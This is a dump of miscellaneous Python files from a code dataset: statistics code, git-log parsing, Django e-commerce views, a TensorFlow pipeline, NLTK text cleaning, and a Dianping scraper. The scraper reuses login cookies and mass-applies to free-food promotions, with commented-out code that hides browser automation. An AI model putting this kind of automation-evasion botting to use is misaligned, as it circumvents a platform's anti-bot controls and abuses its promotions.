ages, times)\n CODELOG.debug(f\"Prior found for {group_name} {key}\")\n else:\n CODELOG.debug(f\"No prior found for {group_name} {key}\")\n continue\n\n estimate_grid_parameters(prior_grid.value, draw_value, ages, times)\n estimate_grid_parameters(prior_grid.dage, draw_dage, ages[:-1], times)\n estimate_grid_parameters(prior_grid.dtime, draw_dtime, ages, times[:-1])\n\n\nclass DrawFunction:\n \"\"\"This says the child draw is the same as the source value.\"\"\"\n def __init__(self, draws, group, key):\n self._draws = draws\n self._group = group\n self._key = key\n\n def __len__(self):\n return len(self._draws)\n\n def __call__(self, idx, age, time):\n return self._draws[idx][self._group][self._key](age, time)\n\n\nclass RandomEffectDrawFunction:\n \"\"\"This applies rate = underlying x exp(random effect).\"\"\"\n def __init__(self, draws, group, key, location):\n self._draws = draws\n self._group = group\n self._key = key\n self._location = location\n\n def __len__(self):\n return len(self._draws)\n\n def __call__(self, idx, age, time):\n underlying = self._draws[idx][self._group][self._key](age, time)\n random_effect = self._draws[idx][\"random_effect\"][(self._key, self._location)](age, time)\n return underlying * np.exp(random_effect)\n\n\ndef gather_draws_for_grid(draws, ages, times):\n \"\"\"Gather data from incoming draws into an array of (draw, age, time)\n\n Args:\n draws (DrawFunction): The draws are a list of Var fits.\n ages (np.ndarray): ages\n times (np.ndarray): times\n\n Returns:\n (np.ndarray, np.ndarray, np.ndarray): 3 numpy arrays\n of shape (age, time, draws) where the second two have one-fewer ages\n and one-fewer times.\n \"\"\"\n draw_data = np.zeros((len(draws), len(ages), len(times)))\n for didx in range(len(draws)):\n for aidx, age in enumerate(ages):\n for tidx, time in enumerate(times):\n draw_data[didx, aidx, tidx] = draws(didx, age, time)\n\n draw_data = draw_data.transpose([1, 2, 0])\n draw_dage = np.diff(draw_data, n=1, axis=0)\n draw_dtime = np.diff(draw_data, n=1, axis=1)\n return draw_data, draw_dage, draw_dtime\n\n\ndef estimate_grid_parameters(grid_priors, draws, ages, times):\n assert isinstance(draws, np.ndarray)\n assert len(draws.shape) == 3\n\n for aidx, tidx in it.product(range(len(ages)), range(len(times))):\n age = ages[aidx]\n time = times[tidx]\n grid_priors[age, time] = grid_priors[age, time].mle(draws[aidx, tidx, :])\n","sub_path":"src/cascade/executor/priors_from_draws.py","file_name":"priors_from_draws.py","file_ext":"py","file_size_in_byte":5183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"345809972","text":"import numpy as np\nimport math\n\nn1=int(input(\"enter length of m\"))\nn2=int(input(\"enter length of n\"))\n\nx=np.array(input(\"enter value\"))\t\n\t#x.append(a)\nprint(type(x))\n\n#h=[]\nh=np.array(input(\"enter value\"))\n\t#h.append(b)\n\ny=[]\nfor n in range(n1+n2-1):\n sum=0\n for k in range(n1):\n if (n-k>=0)and(n-k<=n2-1):\n m=np.multiply(x[k],h[n-k])\n sum=sum+m\n y=np.append(y,sum)\n\t\t\t\nprint(y) \n\n\n\n#y[0]=x[0]*h[0]\n#y[1]=x[1]*h[0]+x[0]*h[1]\n","sub_path":"discrete_convolution.py","file_name":"discrete_convolution.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"574413618","text":"from setting import PATH_OF_GITCLONE, PATH_OF_GITLOGTXT, PATH_OF_ERROR_GITLOG, PATH_OF_GITLOGCSV, PATH_OF_GITSHOWLIST\nfrom tqdm import tqdm\nimport subprocess\nimport os\nimport re\nimport pandas as pd\n\n\n\"\"\"\n1. git log -p -w を実行\n2. Dockerfileを変更に含む commitID(revision)を取り出す\n3. CSV ファイルに書き出す\n\"\"\"\n\ndef isTargetRepository(repository):\n outputs = os.listdir(PATH_OF_GITLOGTXT)\n\n if repository == \".DS_Store\":\n pass\n elif repository == \"docker_docker\":\n print(\"This is same to moby\")\n pass\n elif f'{repository}.txt' in outputs:\n print(\"Already Exists!\")\n else:\n return True\n\n return False\n\n\ndef GitlogFileStatus(repository):\n \"\"\"\n file status\n - M : Modified\n - D : Deleted\n - A : Added\n \"\"\"\n\n # -m: マージコミットを通常のコミットと同じように扱うオプション。\n # --pretty=fuller: commit日とpush(rebaseなど)日を明確に表示する機能だと思ってる(たぶん)\n # https://vividcode.hatenablog.com/entry/git/author-date-and-committer-date\n command = f'git log --name-status -m --pretty=fuller'\n cwd = f'./{PATH_OF_GITCLONE}/{repository}/'\n\n # ignore utf-8 Error\n txtGitFileStatus = subprocess.run(list(command.split()), cwd=cwd, encoding='utf-8', stdout=subprocess.PIPE, errors=\"ignore\")\n txtGitFileStatus = str(txtGitFileStatus.stdout)\n\n with open(f'{PATH_OF_GITLOGTXT}/{repository}.txt', 'w') as f:\n f.write(txtGitFileStatus)\n \n # エラー処理\n if txtGitFileStatus == \"\":\n with open(PATH_OF_ERROR_GITLOG, 'a+') as f:\n f.seek(0)\n if not repository in f.read():\n f.write(f\"fatal: your current branch 'master' does not have any commits yet -> {repository}\\n\")\n\n return False\n\n return txtGitFileStatus\n\n\"\"\"\noutputCSV\n> CommitID\n> Author\n> Date\n> Dockerfiles\n> Status\n\"\"\"\n\ndef appendToResult(result, tmp, status, dockerfile, merge_from):\n result[\"CommitID\"].append(tmp[\"CommitID\"])\n result[\"Author\"].append(tmp[\"Author\"])\n result[\"Date\"].append(tmp[\"Date\"])\n result[\"Dockerfile\"].append(dockerfile)\n result[\"Status\"].append(status)\n\n \"\"\"\n コミット者を特定するときに\n githubのページからコミット履歴を確認したところ 'マージコミット'は含まれていない\n コミット者リストを出す上で 'マージは除外する必要があるため情報を追加'\n \"\"\"\n if merge_from == \"no-merge\":\n result[\"Merged?\"].append(False)\n else:\n result[\"Merged?\"].append(True)\n\n return result\n\ndef appendRevisionFile(revisionFileList, commitid, filename):\n revisionFile = f\"{commitid}:{filename}\"\n if revisionFile in revisionFileList:\n return revisionFileList\n else:\n revisionFileList.append(revisionFile)\n return revisionFileList\n\n\ndef saveRevisonFileToShow(revisionFileList, repository):\n txt = '\\n'.join(revisionFileList)\n with open(f\"./{PATH_OF_GITSHOWLIST}/{repository}.txt\", \"w\") as f:\n f.write(txt)\n\n\ndef RevisionsHaveDocker(repository, txtGitFileStatus):\n result = { \"CommitID\":[], \"Author\":[], \"Date\":[], \"Dockerfile\":[], \"Status\":[], \"Merged?\":[]}\n tmp = { \"CommitID\":\"\", \"Author\":\"\", \"Date\":\"\" }\n merge = [None, None]\n merge_from = \"no-merge\"\n revisionFileList = []\n\n for i, txt in enumerate(txtGitFileStatus.splitlines()):\n if txt[:6] == \"commit\":\n tmp[\"CommitID\"] = txt[7:47]\n if \"from\" in txt[47:]:\n merge_from = txt[54:94]\n merge = [None, None]\n else:\n merge_from = \"no-merge\"\n\n elif txt[:6] == \"Merge:\":\n # Master, Dev\n merge = txt[7:].split()\n\n elif txt[:7] == \"Author:\":\n tmp[\"Author\"] = txt[8:]\n elif txt[:7] == \"Commit:\":\n # Author と Commiter が異なる場合があり,コミット人数を把握するために複数人を記載するようにした\n if tmp[\"Author\"] != txt[8:]:\n tmp[\"Author\"] += f\"\\n{txt[8:]}\"\n elif txt[:11] == \"CommitDate:\":\n tmp[\"Date\"] = txt[12:]\n\n elif (\"Dockerfile\" == txt[-10:]) or (\"dockerfile\" == txt[-10:]):\n # masterの変更のみ取得\n if (merge_from != \"no-merge\") and (merge_from.startswith(merge[1])):\n continue\n\n if txt[0] != \" \":\n if txt[0] == \"R\":\n status = f\"{txt[0]}\"\n dockerfile = f\"{txt.split()[1]} {txt.split()[2]}\"\n result = appendToResult(result, tmp, status, dockerfile, merge_from)\n # いつ削除されたかを明確にするため、R100 でも取得する\n revisionFileList = appendRevisionFile(revisionFileList, tmp[\"CommitID\"], txt.split()[2])\n else:\n status = f\"{txt[0]}\"\n dockerfile = f\"{txt.split()[1]}\"\n result = appendToResult(result, tmp, status, dockerfile, merge_from)\n if txt[0] != \"D\":\n revisionFileList = appendRevisionFile(revisionFileList, tmp[\"CommitID\"], txt.split()[1])\n\n result = pd.DataFrame.from_dict(result)\n result.to_csv(f\"./{PATH_OF_GITLOGCSV}/{repository}.csv\")\n\n saveRevisonFileToShow(revisionFileList, repository)\n\n\n\n\nif __name__ == \"__main__\":\n repositories = os.listdir(PATH_OF_GITCLONE)\n count = 0\n\n for repository in tqdm(repositories):\n\n if not isTargetRepository(repository):\n continue\n\n txtGitFileStatus = GitlogFileStatus(repository)\n if not txtGitFileStatus:\n continue\n\n RevisionsHaveDocker(repository, txtGitFileStatus)\n\n\n","sub_path":"2-git_log_extractDockerfile.py","file_name":"2-git_log_extractDockerfile.py","file_ext":"py","file_size_in_byte":5771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"363229283","text":"class Solution:\n # @param s, a string\n # @param dict, a set of string\n # @return a boolean\n def wordBreak(self, s, dict):\n status = [False] * (len(s) + 1)\n status[0] = True\n i = 0\n while i < len(s)+1:\n j = 0\n while j < i:\n if status[j] and s[j:i] in dict:\n status[i] = True\n break\n j += 1\n i += 1\n return status[-1]\n","sub_path":"word_break.py","file_name":"word_break.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"118448584","text":"import math\n\nfrom repositories.product import ProductRepository\nfrom repositories.image import ImageRepository\nfrom repositories.price import PriceRepository\nfrom entities.product import ProductEntity\nfrom entities.image import ImageEntity\nfrom entities.price import PriceEntity\n\n\nclass PriceService:\n\n @classmethod\n def update(cls):\n # clear by supplier\n PriceRepository.clear_price_by_supplier(supplier='АЙТИ')\n\n # get products count\n products_count = ProductRepository.get_active_products_count()\n\n # get products list\n offset = 0\n limit = 10000\n steps = math.ceil(products_count / limit)\n\n for step in range(steps):\n offset = limit*step\n product_entities = ProductRepository.get_products(limit=limit, offset=offset)\n\n price_entities = [PriceEntity(\n _article=product_entity.part, \n _kod=product_entity.sku, \n _name=product_entity.name, \n _cena=product_entity.price, \n _valuta='RUB', \n _nalichie=product_entity.quantity, \n _postavchik='АЙТИ', \n _img=product_entity.url, \n ) for product_entity in product_entities]\n\n # create\n PriceRepository.create(price_entities=price_entities)","sub_path":"services/price.py","file_name":"price.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"129665026","text":"# -*- coding: utf-8 -*-\nfrom time import sleep\n\nimport requests\nfrom lxml import etree\nfrom selenium import webdriver\nfrom selenium.webdriver import ChromeOptions\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\n\n\n# 二维码登陆网页,没破解成功验证码登陆\ndef login_web():\n \"\"\"\n :return:登陆的cookie\n \"\"\"\n chromePath = '/Users/pasca/Desktop/github/MySpiderTool/chromedriver'\n options = ChromeOptions() # 实例化一个ChromeOptions对象\n options.add_experimental_option('excludeSwitches', ['enable-automation']) # 以键值对的形式加入参数\n driver = webdriver.Chrome(executable_path=chromePath, chrome_options=options)\n driver.get('https://account.dianping.com/login?redir=http%3A%2F%2Fwww.dianping.com%2F')\n timeout = WebDriverWait(driver, 10) # 定义超时事件\n timeout.until(EC.frame_to_be_available_and_switch_to_it(\n (By.XPATH, '//*[@id=\"J_login_container\"]/div/iframe'))) # 切换到 frame 框架\n WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.CLASS_NAME, 'qrcode-img'))) # 查看是否有扫码,验证是否登陆\n driver.switch_to.default_content() # 切出框架\n WebDriverWait(driver, 180).until(EC.presence_of_element_located((By.XPATH, '/html/body/div[1]/div[2]/div[1]/div[2]'))) # 出现扫码登陆后关闭\n sleep(40)\n # timeout.until(EC.element_to_be_clickable((By.CLASS_NAME, 'bottom-password-login'))).click() # 点击 “账户登陆”\n # # timeout.until(EC.element_to_be_clickable((By.ID, 'tab-account'))).click().click() # 点击手机密码登陆\n # driver.execute_cdp_cmd(\"Page.addScriptToEvaluateOnNewDocument\", {\n # \"source\": \"\"\"Object.defineProperty(navigator, 'webdriver', {get: () => undefined})\"\"\",\n # })\n #\n # phone = input('请输入手机号码:')\n # # 定位手机号码输入框\n # username = timeout.until(EC.presence_of_element_located((By.ID, 'mobile-number-textbox')))\n # for data in list(phone):\n # username.send_keys(data)\n # sleep(1)\n # driver.find_element_by_xpath(r'//*[@id=\"send-number-button\"]').click()\n # key = input('请输入验证码:')\n # driver.find_element_by_xpath(r'//*[@id=\"number-textbox\"]').send_keys(key)\n # # 点击\"获取验证码\"\n # timeout.until(EC.presence_of_element_located((By.ID, 'send-number-button'))).click()\n # # 点击登录\n # sleep(random.uniform(0, 1))\n # driver.find_element_by_xpath('//button[@id=\"login-button-account\"]').click()\n\n cookie = driver.get_cookies()\n cookies = {}\n for each in cookie:\n cookies[each['name']] = each['value'] # 处理cookies,得到正确格式\n return cookies\n\n\n# 报名项目\ndef apply_project(offlineActivityId, branchId, applyPhone):\n data = {\n 'offlineActivityId': offlineActivityId,\n 'phoneNo': applyPhone,\n 'shippingAddress': '',\n 'extraCount': '',\n 'birthdayStr': '',\n 'email': '',\n 'marryDayStr': '',\n 'babyBirths': '',\n 'pregnant': '',\n 'marryStatus': '0',\n 'comboId': '',\n 'branchId': branchId,\n 'usePassCard': '0',\n 'passCardNo': '',\n 'isShareSina': 'false',\n 'isShareQQ': 'false'\n }\n\n response = requests.post('http://s.dianping.com/ajax/json/activity/offline/saveApplyInfo', headers=headers,\n cookies=cookies,\n data=data, verify=False).json()\n return response\n\n\n# 获取分店 ID\ndef get_branch(offlineActivityId):\n data = {\n 'offlineActivityId': offlineActivityId\n }\n url = 'http://s.dianping.com/ajax/json/activity/offline/loadApplyItem'\n\n response = requests.post(url=url, headers=headers,\n cookies=cookies,\n data=data, verify=False).json()\n code = response.get('code')\n msg = response.get('msg')\n html = msg.get('html')\n if code == 500:\n return '', '', html\n else:\n htmlData = etree.HTML(html)\n branchId = htmlData.xpath('//div/ul/li[2]/select/option[2]/@value')[\n 0] # 获取属性内容:/li/a/@herf , 获取文本内容:/li/a/text()\n branchName = htmlData.xpath('//div/ul/li[2]/select/option[2]/text()')[\n 0] # 获取属性内容:/li/a/@herf , 获取文本内容:/li/a/text()\n branchName = htmlData.xpath('//div/ul/li[2]/select/option[2]/text()')[\n 0] # 获取属性内容:/li/a/@herf , 获取文本内容:/li/a/text()\n return branchId, branchName, '报名成功'\n\n\n# 手机号\ndef get_phone(offlineActivityId):\n data = {\n 'offlineActivityId': offlineActivityId\n }\n url = 'http://s.dianping.com/ajax/json/activity/offline/loadApplyItem'\n\n response = requests.post(url=url, headers=headers,\n cookies=cookies,\n data=data, verify=False).json()\n code = response.get('code')\n msg = response.get('msg')\n html = msg.get('html')\n if html == \"您已经参与过了\" or []:\n return None\n else:\n htmlData = etree.HTML(html)\n applyPhone = htmlData.xpath('//div/ul/li/input/@value') # 获取属性内容:/li/a/@herf , 获取文本内容:/li/a/text()\n # print(applyPhone)\n return applyPhone\n\n# 获取美食列表信息\ndef free_food_list():\n for page in range(1, 30):\n data = '{\"cityId\":\"1\",\"type\":0,\"mode\":\"\",\"page\":%s}' % page # type1:美食,type2:丽人,type6:玩乐\n ajaxListURL = 'http://m.dianping.com/activity/static/pc/ajaxList'\n response = requests.post(url=ajaxListURL, headers=headers1,\n cookies=cookies,\n data=data, verify=False).json()\n if response.get('code') == 200:\n data = response.get('data')\n detail = data.get('detail')\n offlineActivityId = detail[0].get('offlineActivityId') # 为了获取手机号码额外加的\n applyPhone = get_phone(offlineActivityId)\n for i in range(len(detail)):\n branchId = ''\n offlineActivityId = detail[i].get('offlineActivityId')\n detailUrl = detail[i].get('detailUrl')\n activityTitle = detail[i].get('activityTitle')\n applyResponse = apply_project(offlineActivityId, branchId, applyPhone)\n code = applyResponse.get('code')\n msg = applyResponse.get('msg')\n html = msg.get('html')\n if code == 200:\n print(detailUrl, activityTitle, '报名成功!')\n elif code == 500 and html == \"请选择分店\":\n branchId, branchName, infoRes = get_branch(offlineActivityId)\n apply_project(offlineActivityId, branchId, applyPhone)\n print(detailUrl, activityTitle, branchName, infoRes)\n elif code == 500 and msg == None:\n print(detailUrl, activityTitle, '报名异常')\n else:\n print(detailUrl, activityTitle, html)\n else:\n print(response.get('errorMsg'))\n\n\nif __name__ == '__main__':\n cookies = login_web()\n print(cookies)\n headers1 = {\n 'Connection': 'keep-alive',\n 'Pragma': 'no-cache',\n 'Cache-Control': 'no-cache',\n 'Accept': 'application/json, text/javascript, */*; q=0.01',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36',\n 'Content-Type': 'application/json',\n # 'Cookie': cookies,\n 'Origin': 'http://s.dianping.com',\n 'Referer': 'http://s.dianping.com/',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n }\n headers = {\n 'Connection': 'keep-alive',\n 'Pragma': 'no-cache',\n 'Cache-Control': 'no-cache',\n 'Accept': 'application/json, text/javascript',\n 'X-Requested-With': 'XMLHttpRequest',\n 'X-Request': 'JSON',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36',\n 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8;',\n 'Origin': 'http://s.dianping.com',\n # 'Cookie': cookies,\n # 'Referer': 'http://s.dianping.com/event/2123372828',\n 'Accept-Language': 'zh-CN,zh;q=0.9'\n }\n free_food_list()","sub_path":"dianPingFreeFood.py","file_name":"dianPingFreeFood.py","file_ext":"py","file_size_in_byte":8584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"165311598","text":"import datetime\nfrom django.shortcuts import redirect, render, get_list_or_404, render_to_response\nfrom ecommerce.models import *\n\n# Create your views here.\n\ndef index(request):\n \"\"\"\n 商品一覧画面(/ec/list/)が呼び出された際に呼び出されるビューです。\n 商品情報を返します。\n \"\"\"\n\n products = get_list_or_404(Product)\n\n # セッションにカートの情報を格納するListを定義します。\n if not request.session.has_key('cart'):\n request.session['cart'] = list()\n\n response = render(request, 'product_list.html', {'products': products})\n\n return response\n\ndef cart_add(request, product_id):\n \"\"\"\n カートに任意の商品を追加する場合に呼び出されるビューです。\n カート(セッション)に任意の商品の商品IDを追加します。\n \"\"\"\n\n # カート(セッション)に商品を追加します。\n if not request.session.has_key('cart'):\n request.session['cart'] = list()\n\n cart = request.session['cart']\n\n if any([item['product_id'] == product_id for item in cart]):\n item = [item for item in cart if item['product_id'] == product_id][0]\n item['count'] = str(int(item['count']) + int(request.POST['count']))\n else:\n cart.append({\n 'product_id': product_id,\n 'count': request.POST['count'],\n })\n\n request.session['cart'] = cart\n\n products = get_list_or_404(Product)\n\n response = redirect('/ec/list/', {'products': products})\n\n return response\n\ndef cart_delete(request, product_id):\n \"\"\"\n カートに入っている任意の商品を削除する場合に呼び出されるビューです。\n カート(セッション)から任意の商品の商品IDを削除します。\n \"\"\"\n\n # カート(セッション)から指定された商品を削除します。\n if not request.session.has_key('cart'):\n request.session['cart'] = list()\n cart = request.session['cart']\n # 同じ商品が複数listに入っていた場合に、指定されてIDのオブジェクトをすべて削除する\n cart = [item for item in cart if item['product_id'] is not str(product_id)]\n request.session['cart'] = cart\n\n products = get_list_or_404(Product)\n\n response = redirect('/ec/list/', {'products': products})\n\n return response\n\n\ndef cart_reset(request):\n \"\"\"\n カートを空にするがクリックされた場合に実行されるビューです。\n カートの中身(セッション)を空にします。\n \"\"\"\n\n # カート(セッション)からすべての商品を削除します。\n if not request.session.has_key('cart'):\n request.session['cart'] = list()\n del request.session['cart']\n\n products = get_list_or_404(Product)\n\n response = redirect('/ec/list/', {'products': products})\n\n return response\n\ndef cart_list(request):\n \"\"\"\n カートの中身を表示するページが表示される場合に実行されるビューです。\n カートに入っている商品情報を返します。\n \"\"\"\n\n # カート(セッション)内にある商品IDを取得します。\n if not request.session.has_key('cart'):\n request.session['cart'] = list()\n cart = request.session['cart']\n\n # カートに入っている商品の情報を取得します\n products = Product.objects.filter(id__in=[item['product_id'] for item in cart])\n\n details = []\n\n for product in products:\n details.append({\n 'product': product,\n 'count': [item for item in cart if item['product_id'] == str(product.id)][0]['count']\n })\n\n return render(request, 'cart_list.html', {'details': details})\n\ndef order(request):\n \"\"\"\n 注文画面が表示される場合に実行されるビューです。\n カートに入っている商品情報と決済方法と注文画面を返します。\n \"\"\"\n\n # カート(セッション)内にある商品IDを取得します。\n if not request.session.has_key('cart'):\n request.session['cart'] = list()\n cart = request.session['cart']\n\n # カートに入っている商品の情報を取得します\n products = Product.objects.filter(id__in=[item['product_id'] for item in cart])\n\n # 決済方法を取得します。\n payments = get_list_or_404(Payment)\n\n details = []\n total = 0\n\n for product in products:\n count = [item for item in cart if item['product_id'] == str(product.id)][0]['count']\n subtotal = int(product.price) * int(count)\n total += subtotal\n details.append({\n 'product': product,\n 'count': count,\n 'subtotal': subtotal\n })\n\n return render(request, 'order.html', {'details': details, 'payments': payments, 'total': total})\n\ndef order_execute(request):\n \"\"\"\n 注文画面からPOSTされた際に実行されるビューです。\n お客様情報を保存し注文された商品情報を保存します。\n \"\"\"\n\n # 送信されたお客様情報を保存します。\n customer = Customer(first_name=request.POST['first_name'],\n last_name=request.POST['last_name'],\n postal_code=request.POST['postal_code'],\n prefecture=request.POST['prefecture'],\n city=request.POST['city'],\n street1=request.POST['street1'],\n street2 =request.POST['street2'],\n tel=request.POST['tel'],\n email=request.POST['email'])\n customer.save()\n\n # Paymentオブジェクトを取得します。\n payment = Payment.objects.get(id=int(request.POST['payment']))\n\n # 注文情報を保存します。\n order = Order(customer=customer, payment=payment)\n order.save()\n\n # カート(セッション)内にある商品IDを取得します。\n if not request.session.has_key('cart'):\n request.session['cart'] = list()\n cart = request.session['cart']\n\n # カートに入っている商品の情報を取得します\n products = Product.objects.filter(id__in=[item['product_id'] for item in cart])\n\n for product in products:\n order_product = Order_Product(order=order, product=product, count=1, price=product.price)\n order_product.save()\n\n # 注文完了画面にリダイレクトします。\n return redirect('/ec/order_complete/')\n\ndef order_complete(request):\n \"\"\"\n 注文完了時に実行されるビューです。\n 注文完了画面を返します。\n \"\"\"\n\n response = render_to_response('order_complete.html')\n\n # カートの中身を削除します\n if request.session.has_key('cart'):\n del request.session['cart']\n return response\n\ndef good_add(request, product_id):\n \"\"\"\n 言い値ボタン!\n \"\"\"\n\n product = Product.objects.filter(id__in=product_id).first()\n product.good += 1\n product.save()\n\n products = get_list_or_404(Product)\n\n response = redirect('/ec/list/', {'products': products})\n\n return response\n\ndef cat_filter(request):\n \"\"\"\n 商品一覧画面(/ec/list/)にてカテゴリーのリンクが押された際に呼び出されるビューです。\n カテゴリーでフィルターした商品情報を返します。\n \"\"\"\n\n # カテゴリー取得\n message = request.GET.get('cat', 1)\n\n # 商品リストを指定されたカテゴリーでフィルタリングします\n products = Product.objects.filter(category=message)\n\n response = render(request, 'product_list.html', {'products': products})\n\n return response\n","sub_path":"ecommerce_website/ecommerce/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"44446015","text":"from django.db import models\n\nNetwork_choices = (\n ('airtel', 'Airtel'),\n ('vodafone', 'Vodafone'),\n ('docomo', 'Docomo'),\n ('idea', 'Idea'),\n)\n\nclass Clients(models.Model):\n #auto_increment_id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=20)\n mob_no = models.BigIntegerField()\n network = models.CharField(max_length=20, choices = Network_choices, default='new')\n date = models.DateTimeField('date created', auto_now_add = True)\n dob = models.DateField()\n\n def __str__(self):\n return self.name\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"146894680","text":"import tensorflow as tf\n\nassert tf.__version__ == \"1.8.0\"\ntf.set_random_seed(20180130)\n\nsess = tf.Session()\n\n\ndef add_to_batch(image):\n print('Adding to batch')\n image_batch = tf.train.shuffle_batch([image], batch_size=5, capacity=11, min_after_dequeue=1, num_threads=1)\n\n # Add to summary\n tf.summary.image('images', image_batch)\n\n return image_batch\n\n\ndef get_batch():\n # Create filename queue of images to read\n filenames = [\"sample.jpg\" for _ in range(11)]\n filename_queue = tf.train.string_input_producer(filenames)\n reader = tf.WholeFileReader()\n key, value = reader.read(filename_queue)\n\n # Read and process image\n my_image = tf.image.decode_png(value)\n my_image_float = tf.cast(my_image, tf.float32)\n image_mean = tf.reduce_mean(my_image_float)\n my_noise = tf.random_normal([959, 959, 3], mean=image_mean)\n my_image_noisy = my_image_float + my_noise\n print('Reading images')\n\n return add_to_batch(my_image_noisy)\n\n\ndef main():\n sess.run(tf.initialize_all_variables())\n writer = tf.summary.FileWriter('./summary_logs', graph_def=sess.graph_def)\n images = get_batch()\n tf.train.start_queue_runners(sess=sess)\n merged = tf.summary.merge_all()\n summary_str = sess.run(merged)\n writer.add_summary(summary_str)\n print(\"Start training\")\n\n\nmain()\n","sub_path":"StackOverflow/APIM-25/35714832-fix/batches.py","file_name":"batches.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"644060125","text":"from nltk.tokenize import RegexpTokenizer\nfrom nltk.corpus import stopwords\nimport re\nimport nltk\nimport gensim\nimport pickle\nfrom collections import Counter\n\ntokenizer = RegexpTokenizer(r'\\w+')\nnltk.data.path.append(\"data\")\n\n\n# Aggiungo nuove stop_word a quelle già presenti nella libreria nltk\ndef stop_word(other_stop=None):\n word = stopwords.words('italian')\n word = word + stopwords.words('english')\n word += ['il', 'di', 'e', 'a', 'un', 'in', 'che', 'non', 'si', 'da', 'lo', 'per', 'con', 'ma', 'come', 'su', 'mi',\n 'anche', 'o',\n 'io', 'se', 'perché', 'li', 'ci', 'ne', 'lei', 'ancora', 'tu', 'lui', 'senza', 'bene', 'cui', 'chi', 'già',\n 'dopo',\n 'uno', 'noi', 'dove', 'qui', 'no', 'allora', 'tra', 'vi', 'ora', 'fra', 'prima', 'forse', 'sì', 'sotto',\n 'voi',\n 'fino', 'oggi', 'quasi', 'pure', 'egli', 'mentre', 'contro', 'invece', 'esso', 'là', 'però', 'né',\n 'subito', 'verso',\n 'ciò', 'ecco', 'loro', 'essa', 'fuori', 'meno', 'adesso', 'niente', 'cioè', 'male', 'nulla', 'ah', 'oh',\n 'quindi', 'appena',\n 'insieme', 'dunque', 'dentro', 'durante', 'almeno', 'secondo', 'anzi', 'oramai', 'oltre', 'intorno',\n 'sopra', 'dietro',\n 'davanti', 'soltanto', 'infatti', 'qualcosa', 'spesso', 'accordo', 'ieri', 'davvero', 'lì', 'qualcuno',\n 'avanti', 'assai',\n 'presto', 'qua', 'domani', 'circa', 'giù', 'soprattutto', 'nemmeno', 'grazie', 'tuttavia', 'appunto',\n 'neppure', 'eh',\n 'veramente', 'tardi', 'insomma', 'presso', 'intanto', 'lungo', 'neanche', 'piuttosto', 'stasera', 'perciò',\n 'naturalmente',\n 'accanto', 'eppure', 'eccetera', 'finalmente', 'infine', 'poiché', 'comunque', 'dinanzi', 'abbastanza',\n 'peccato',\n 'certamente', 'coloro', 'attorno', 'magari', 'oppure', 'inoltre', 'indietro', 'addosso', 'addirittura',\n 'finché', 'perfino',\n 'affatto', 'stamattina', 'completamente', 'probabilmente', 'chissà', 'sino', 'ognuno', 'entro', 'così',\n 'quindi', 'far',\n 'aver', 'fare', 'avere', 'essere', 'come', 'gennaio', 'febbraio', 'marzo', 'aprle', 'maggio', 'giugno',\n 'luglio', 'agosto',\n 'settembre', 'ottobre', 'novembre', 'dicembre', 'umomo', 'donna', 'italia', 'cosa', 'anno', 'volta',\n 'italia', 'italiano',\n 'italiana', 'uno', 'due', 'tre', 'quattro', 'cinque', 'sei', 'sette', 'otto', 'nove', 'dieci', 'solo',\n 'dopo',\n 'quale', 'quali', 'questo', 'quello', 'quelli', 'quelle', 'con', 'anni', 'può', 'poi', 'mai', 'quando',\n 'dove',\n 'molto', 'stata', 'sempre', 'nuovo', 'nuova', 'mila', 'via', 'stai', 'fatto', 'far', 'fare', 'fanno',\n 'dice', 'dire',\n 'detto', 'stati', 'stato', 'persone', 'parte', 'proprio', 'ogni', 'primo', 'secondo', 'minuto', 'vita',\n 'alcuni', 'ore', 'altri', 'quel', 'poco', 'italiano', 'modo', 'potrebbe', 'altra', 'tutta', 'tutto',\n 'tutte', 'mesi', 'posto', 'deve', 'devono', 'dover', 'dato', 'dati', 'visto', 'visti', 'casa', 'grandi',\n 'state', 'italiani', 'ultimo', 'qualche', 'continua', 'news']\n if not other_stop is None:\n word += other_stop\n return list(set(word))\n\n\n# Funzione che riceve un testo e lo resituisce senza le stop_word, eliminando le parole di lunghezza minore di 2\n# e caratteri non letterali\ndef delete_word(text, other_stop=None):\n text = re.sub('[^a-zA-Zàèìòùé]', ' ', text)\n text = text.lower()\n stop = stop_word(other_stop=other_stop)\n token = tokenizer.tokenize(text)\n token = [x for x in token if x not in stop and len(x) > 2]\n text = ' '.join(token)\n\n return text\n\n\n# Funzione che unisce le parole che si presentano spesso in coppia (es. new york)\ndef bigram_text(titles):\n # il token è la singola parola\n token = [tokenizer.tokenize(x) for x in titles]\n bigram = gensim.models.Phrases(token, min_count=10, threshold=20)\n trigram = gensim.models.Phrases(bigram[token], min_count=10, threshold=20)\n trigram_mod = gensim.models.phrases.Phraser(trigram)\n token = [trigram_mod[x] for x in token]\n titles 